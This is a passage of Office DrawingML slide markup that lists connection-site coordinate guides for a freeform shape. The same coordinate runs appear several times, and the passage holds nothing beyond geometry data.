              <a:gd name="connsiteX144" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY16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0510 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY16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0510 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY16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66158 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1142577 h 6858000"/>
